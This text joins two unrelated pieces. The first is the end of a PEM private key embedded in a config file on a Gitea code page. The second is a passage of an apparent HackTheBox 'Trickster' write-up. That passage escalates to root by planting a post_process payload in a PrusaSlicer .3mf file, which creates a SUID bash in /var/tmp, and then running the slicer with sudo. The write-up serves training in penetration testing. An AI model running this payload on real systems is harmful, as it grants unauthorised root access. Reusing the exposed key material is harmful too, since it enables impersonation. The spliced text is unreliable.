UIHnnv9jrqfHGYoq9g5rQWKyjxMTlKA8PnMiKzssiQKBgQDeamSzzG6fdtSlK8zC
TXHpssVQjbw9aIQYX6YaiApvsi8a6V5E8IesHqDnS+s+9vjrHew4rZ6Uy0uV9p2P
MAi3gd1Gl9mBQd36Dp53AWik29cxKPdvj92ZBiygtRgTyxWHQ7E6WwxeNUWwMR/i
4XoaSFyWK7v5Aoa59ECduzJm1wKBgQDVFaDVFgBS36r4fvmw4JUYAEo/u6do3Xq9
JQRALrEO9mdIsBjYs9N8gte/9FAijxCIprDzFFhgUxYFSoUexyRkt7fAsFpuSRgs
+Ksu4bKxkIQaa5pn2WNh1rdHq06KryC0iLbNii6eiHMyIDYKX9KpByaGDtmfrsRs
uxD9umhKIwKBgECAXl/+Q36feZ/FCga3ave5TpvD3vl4HAbthkBff5dQ93Q4hYw8
rTvvTf6F9900xo95CA6P21OPeYYuFRd3eK+vS7qzQvLHZValcrNUh0J4NvocxVVn
RX6hWcPpgOgMl1u49+bSjM2taV5lgLfNaBnDLoamfEcEwomfGjYkGcPVAoGBAILy
1rL84VgMslIiHipP6fAlBXwjQ19TdMFWRUV4LEFotdJavfo2kMpc0l/ZsYF7cAq6
fdX0c9dGWCsKP8LJWRk4OgmFlx1deCjy7KhT9W/fwv9Fj08wrj2LKXk20n6x3yRz
O/wWZk3wxvJQD0XS23Aav9b0u1LBoV68m1WCP+MHAoGBANwjGWnrY6TexCRzKdOQ
K/cEIFYczJn7IB/zbB1SEC19vRT5ps89Z25BOu/hCVRhVg9bb5QslLSGNPlmuEpo
HfSWR+q1UdaEfABY59ZsFSuhbqvC5gvRZVQ55bPLuja5mc/VvPIGT/BGY7lAdEbK
6SMIa53I2hJz4IMK4vc2Ssqq
-----END PRIVATE KEY-----
' ,
),
);
Reference in New Issue View Git Blame Copy Permalink
Powered by Gitea Version: 1.22.1 Page: 158ms Template: 14ms
English
Bahasa Indonesia Deutsch English Español Français Italiano Latviešu Magyar nyelv Nederlands Polski Português de Portugal Português do Brasil Suomi Svenska Türkçe Čeština Ελληνικά Български Русский Українська فارسی മലയാളം 日本語 简体中文 繁體中文(台灣) 繁體中文(香港) 한국어
Licenses APIWhich we can use to have an SSH session as him, then enumerate his sudo configuration.
Looking for information about this prusaslicer binary, we find a recent RCE exploit available here: https://www.exploit-db.com/exploits/51983 where the vulnerability is explained. Basically you can add a post-process script that will be executed after the binary is run.
Copy the file /opt/PrusaSlicer/TRICKSTER.3mf to your machine and extract with 7z.
> 7z x TRICKSTER.3mfEdit the Slic3r_PE.config file in the Metadata directory as indicated in the exploit description (find the post_process line). Add your favorite payload that you want to be executed as root when the tool is run.
; post_process = "cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash"Also update the output_filename line because otherwise when the prusaslicer application is run an error related to this line is reported.
; output_filename_format = aaa.gcodeZip again all the package, no compression, then rename to .3mf extension.
> zip -r -0 TRICKSTER.zip *
adding: 3D/ (stored 0%)
adding: 3D/3dmodel.model (stored 0%)
adding: [Content_Types].xml (stored 0%)
adding: Metadata/ (stored 0%)
adding: Metadata/Slic3r_PE.config (stored 0%)
adding: Metadata/thumbnail.png (stored 0%)
adding: Metadata/Slic3r_PE_model.config (stored 0%)
adding: _rels/ (stored 0%)
adding: _rels/.rels (stored 0%)
> mv TRICKSTER.zip TRICKSTER.3mfTransfer the resulting .3mf to the box again with scp, then run the prusaslicer application.
> sudo /opt/PrusaSlicer/prusaslicer ~/TRICKSTER.3mf -s
10 => Processing triangulated mesh
10 => Processing triangulated mesh
20 => Generating perimeters
20 => Generating perimeters
30 => Preparing infill
45 => Making infill
30 => Preparing infill
10 => Processing triangulated mesh
20 => Generating perimeters
30 => Preparing infill
45 => Making infill
45 => Making infill
10 => Processing triangulated mesh
20 => Generating perimeters
10 => Processing triangulated mesh
30 => Preparing infill
20 => Generating perimeters
45 => Making infill
30 => Preparing infill
45 => Making infill
65 => Searching support spots
65 => Searching support spots
65 => Searching support spots
65 => Searching support spots
65 => Searching support spots
69 => Alert if supports needed
print warning: Detected print stability issues:
Loose extrusions
Shape-Sphere, Shape-Sphere, Shape-Sphere, Shape-Sphere
Collapsing overhang
Shape-Sphere, Shape-Sphere, Shape-Sphere, Shape-Sphere
Low bed adhesion
TRICKSTER.HTB, Shape-Sphere, Shape-Sphere, Shape-Sphere, Shape-Sphere
Consider enabling supports.
Also consider enabling brim.
88 => Estimating curled extrusions
88 => Estimating curled extrusions
88 => Estimating curled extrusions
88 => Estimating curled extrusions
88 => Estimating curled extrusions
88 => Generating skirt and brim
90 => Exporting G-code to /home/adam/aaa.gcode
Slicing result exported to /home/adam/aaa.gcodeAfter the process finishes, verify the SUID bash binary has been created in the /var/tmp directory, then just spawn a root shell.
You are root.
Last updated